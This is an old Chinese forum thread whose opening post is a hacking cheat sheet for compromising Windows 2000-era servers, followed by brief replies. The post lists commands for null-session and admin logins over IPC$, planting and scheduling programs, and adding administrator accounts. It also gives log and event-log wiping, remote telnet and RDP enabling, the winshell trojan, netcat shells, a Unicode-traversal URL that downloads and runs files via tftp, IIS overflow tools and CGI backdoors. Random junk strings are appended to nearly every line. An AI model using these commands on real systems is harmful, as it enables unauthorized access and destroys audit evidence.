社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 3683阅读
  • 3回复

网管和黑客都必须知道的命令

级别: 总督察
发帖
536
铜板
2493
人品值
302
贡献值
1
交易币
10
好评度
461
信誉值
0
金币
0
所在楼道

网管和黑客都必须知道的命令 Rkm1fYf  
常用的几条NET命令: ^Bn)a"Gd  
$.kP7!`:,  
(与远程主机建立空管连接) net use \\IP地址\ipc$ "" /use:"" ^D\1F$AjC  
xc[@lr  
(以管理员身份登录远程主机) net use \\IP地址\ipc$ "密码" /use:"Administrator" YLVV9(  
9tsI1]1[m  
(传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ fv_}7t7  
zQ9"i  
(查看远程主机时间) net time \\IP地址 $j:$ `  
$u_0"sUV  
(定时启动某个程序) at \\IP地址 02:18 readme.exe !Uz{dFJf;  
o9G%KO&;D,  
(查看共享) net view \\IP地址 L^} Z:I  
0F-X.Dq  
(查看netbios工作组列表) nbtstat -A IP地址 1C\OL!@L  
S!<YVQq  
(将远程主机C盘映射为自己的F盘) net use f: \\IP地址\c$ ""/user:"Administrator" !TY9\8JzV  
|t*(]U2O0  
(这两条把自己增加到管理员组): net user 用户名 密码 /add t m?[0@<s  
n"8vlNeW  
net localgroup Administrators 用户名 /add IY6DZP  
24PEt%2  
(断开连接) net use \\IP地址\ipc$ /delete ,80qwN,  
/e :V44  
扫尾: 7l> |G,[c  
D].!u{##  
del C:\winnt\system32\logfiles\*.* T:q_1W?h]  
~4h<nc  
del C:\winnt\ssytem32\config\*.evt 6s\niro2  
BDSZ'  
del C:\winnt\system32\dtclog\*.* ){`s&?M0  
:b)IDcW&j:  
del C:\winnt\system32\*.log =gS?atbX  
J#vIz  Q  
del C:\winnt\system32\*.txt $ysemDq-a\  
`Bk7W]{L  
del C:\winnt\*.txt R>SS\YC'X  
,#[0As29u  
del C:\winnt\*.log /ylO["<Q  
&C<K|F!j!  
一、netsvc.exe ^;jJVYx-PP  
C,7d  
下面的命令分别是列出主机上的服务项目、查寻和远程启动主机的“时间任务”服务: Z"PPXv-<jY  
0X@!i3eu  
netsvc /list \\IP地址 b/'{6zn  
WZO8|hY  
netsvc schedule \\IP地址 /query q`z/ S>  
V(_OyxeC{2  
netsvc \\IP地址 schedule /start `s5<PCq  
X.hU23w  
二、OpenTelnet.exe :)VO,b~r  
lxb+0fiN  
远程启动主机的Telnet服务,并绑定端口到7878,例如: e5G)83[=  
yG\^PD  
OpenTelnet \\IP地址 用户名 密码 1 7878 wqB{cr}!  
6yk=4l\  
然后就可以telnet到主机的7878端口,进入DOS方式下: 51j5AbFQ"  
)QYg[<e6  
telnet IP地址 7878 bA}9He1  
r(;oDdVc  
三、winshell.exe nVkx Q?2  
jGpSECs  
一个非常小的木马(不到6K),telnet到主机的7878端口,输入密码winshell,当看到CMD>后,可打下面的命令: d%_=r." Y  
6" fYSn>  
p Path (查看winshell主程序的路径信息) Q^X  
|{ W4JFKJ  
b reBoot (重新启动机器) ly"Jl8/<  
pgbm2mT9  
d shutDown (关闭机器) 0$)s? \  
EdFCaW}""  
s Shell (执行后你就会看到可爱的“C:\>”) >KHR;W03  
gY\X?  
x eXit (退出本次登录会话,此命令并不终止winshell的运行) -&4>>h9 _  
<knf^D<"  
CMD> http://.../srv.exe (通过http下载其他网站上的文件到运行winshell的机器上) 68Po`_/s  
nZZNx  
四、3389登陆器,GUI方式登录远程主机的 JPQWRK^  
|,3s]b`  
五、elsave.exe n^aSio6  
U-Ia$b-5!  
事件日志清除工具 VP0q?lh  
Q#"p6ZmI  
elsave -s \\IP地址 -l "application" -C wZ6D\I  
rk$&sDc/3  
elsave -s \\IP地址 -l "system" -C 9A_{*E(wd  
S3#NGBZ/  
elsave -s \\IP地址 -l "security" -C B1<:nl  
D.d(D:  
执行后成功清除应用程序日志,系统日志,安全日志 ZrY #B8  
p}q27<O*/  
六、hbulot.exe $ N`V%<W  
8K+(CS>xvO  
开启win2kserver和winxp的3389服务 |dIP &9  
.{+KKa $@G  
hbulot [/r] xz2U?)m;x  
^b|Z<oF  
使用/r表示安装完成后自动重起目标使设置生效。 ,=sbK?&  
pde,@0(Fa  
七、nc.exe(netcat.exe) EdGA#i3  
{UqSq  
一个很好的工具,一些脚本程序都要用到它,也可做溢出后的连接用。 ;W%nBdE6|  
(NfP2E|B  
想要连接到某处: nc [-options] hostname port[s] [ports] ... aAM!;3j]B`  
F6>K FU8  
绑定端口等待连接: nc -l -p port [-options] [hostname] [port] 2iOn\ ^]x  
EWOS6Yg7  
参数: p7 s#j  
>tF3|:\  
-e prog 程序重定向,一旦连接,就执行 [危险!!] 'Cv,:Q  
fM,!9}<  
-g gateway source-routing hop point[s], up to 8 e7e6b-"_2  
*u LOoq  
-G num source-routing pointer: 4, 8, 12, ... k(hYNmmo j  
HIiMq'H^  
-h 帮助信息 WMy97*L<  
+ *u'vt?  
-i secs 延时的间隔 [/dGOl+  
& gF*p  
-l 监听模式,用于入站连接 xPBSJhla  
Bmx+QO  
-n 指定数字的IP地址,不能用hostname w2*.3I,~)B  
1{6BU!  
-o file 记录16进制的传输 A8,9^cQ]  
M)v\7a  
-p port 本地端口号 n(X{|?  
"FuOWI{in  
-r 任意指定本地及远程端口 -CV_yySc  
Pjz_KO/  
-s addr 本地源地址 a=ye!CN^  
^gw htnI  
-u UDP模式 [6 d~q]KH  
D#%aow'(7  
-v 详细输出——用两个-v可得到更详细的内容 Ah^0FU%!g  
ed3d 6/%HR  
-w secs timeout的时间 ~ZrSoVP=  
Mc8|4/<Z  
-z 将输入输出关掉——用于扫描时 u&4CXv=  
八、TFTPD32.EXE RLnsy,  
"53'FRj_\  
把自己的电脑临时变为一台FTP服务器,让肉鸡来下载文件,tftp命令要在肉鸡上执行,通常要利用Unicode漏洞或telnet到肉鸡,例如: eKRslMa  
mL5Nu+#  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本机IP地址 get 文件名 c:\winnt\system32\文件名 j /d? c5  
\9;SOAv  
然后可以直接令文件运行: vjo@aY.x  
3[q&%Z.  
http://IP地址/s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+文件名 0cYd6u@  
8H2zM IB  
九、prihack.exe是IIS的printer远程缓冲区溢出工具。idqover.exe是溢出idq的,选择“溢出后在一个端口监听”,然后用telnet连接它的监听端口,如果溢出成功,一连它的端口,绑定的命令马上执行。xploit.exe是一个图形界面的ida溢出,成功以后winxp下需要打winxp。 !LGnh  
ku2g FO  
一○、ntis.exe、cmd.exe和cmdasp.asp是三个cgi-backdoor,exe要放到cgi-bin目录下,asp放到有ASP执行权限的目录。然后用IE浏览器连接。 b:%z<vo  
fPXMp%T!  
一、一 Xscan命令行运行参数说明: g)Ep'd-w"  
TFZvZi$u&  
在检测过程中,按"[空格]"键可以查看各线程状态及扫描进度,按"q"键保存当前数据后提前退出程序,按"<ctrl+c>"强行关闭程序。 _(J;!,  
T,' {0q  
1.命令格式: xscan -host <起始IP>[-<终止IP>] <检测项目> [其他选项] C\-Abq c  
By3y.}'Ub9  
xscan -file <主机列表文件名> <检测项目> [其他选项] X?6E0/r&9  
+SM&_b  
其中<检测项目> 含义如下: 9gu$vF]9!  
l'yX_`*Iq  
-port : 检测常用服务的端口状态(可通过\dat\config.ini文件的"PORT-SCAN-OPTIONS\PORT-LIST"项定制待检测端口列表); :+ASZE.  
U2Uf69R  
-ftp : 检测FTP弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); v?AQ&'Fk  
CMQlxX?  
-ntpass : 检测NT-Server弱口令(可通过\dat\config.ini文件设置用户名/密码字典文件); Tbf@qid e  
8(AI|"A"-  
-cgi : 检测CGI漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); ^oZz,q  
}Iyr u3M][  
-iis : 检测IIS漏洞(可通过\dat\config.ini文件的"CGI-ENCODE\encode_type"项设置编码方案); s,5SWdb\v  
VV_Zrje  
[其他选项] 含义如下: [G.4S5FX.]  
0<g;g%   
-v: 显示详细扫描进度  uj8G6'm%  
'A^;P]y  
-p: 跳过Ping不通的主机 tx$i(  
8}B*a;d  
-o: 跳过没有检测到开放端口的主机 R,Gr{"H  
"hE/f~\  
-t <并发线程数量[,并发主机数量]>: 指定最大并发线程数量和并发主机数量, 默认数量为100,10
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 终身会员
发帖
690
铜板
11181
人品值
312
贡献值
5
交易币
0
好评度
653
信誉值
0
金币
0
所在楼道
只看该作者 3 发表于: 2006-03-28
努力ing

每個女孩都是一個無淚的天使,當她遇上心愛的男孩是時便有了淚。天使落淚,墜落人間。所以,每一個男孩都不能辜負他的女孩,因爲她曾經爲了你,放棄了整個天堂。
级别: 终身会员
发帖
1207
铜板
37
人品值
257
贡献值
35
交易币
0
好评度
1278
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-03-28
沙发哦 dwH8Zg$B  
太专业信工系的都很难看懂
做我自己
做我自己喜欢的事
爱我自己喜欢的人
级别: 店掌柜
发帖
5692
铜板
103378
人品值
1520
贡献值
26
交易币
0
好评度
5373
信誉值
0
金币
0
所在楼道

只看该作者 1 发表于: 2006-03-28
学习····

简单生活
执著追求
别笑我浅溥,天真的以为用一腔真诚就能感动这个冷漠的世界。
也别说我幼稚,竟想用不长的人生去诠释繁杂的红尘。
然而除了真诚,我还能给你什么,的确我真的一无所有!

描述
快速回复

您目前还是游客,请 登录注册
如果您提交过一次失败了,可以用”恢复数据”来恢复帖子内容
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八